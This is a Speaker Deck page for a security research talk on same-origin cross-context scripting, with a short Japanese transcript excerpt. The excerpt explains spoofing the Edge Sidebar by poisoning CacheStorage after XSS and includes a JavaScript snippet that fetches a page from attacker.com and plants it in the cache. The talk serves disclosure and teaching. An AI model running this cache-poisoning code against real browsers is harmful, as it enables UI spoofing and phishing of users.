Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Same-Origin Cross-Context Scripting

Jun Kokatsu
January 05, 2024
790

Same-Origin Cross-Context Scripting

Shibuya.XSS techtalk #12で登壇した際の資料です。

Jun Kokatsu

January 05, 2024
Tweet

Transcript

  1. Edge Sidebarの偽装 Service WorkerがあるならCacheStorageを汚染してXSSからSidebar偽装まででき る。 caches.open('homepage-base-V1').then(async (cache) => { let

    html = await fetch('https://attacker.com/spoof_page').then(r=>r.text()); let init = { headers: { 'Content-Type': 'text/html' } }; cache.put('/widgets/fullpage/gaming/widget?experiences=CasualGamesHub& sharedHeader=1', new Response(html, init)); });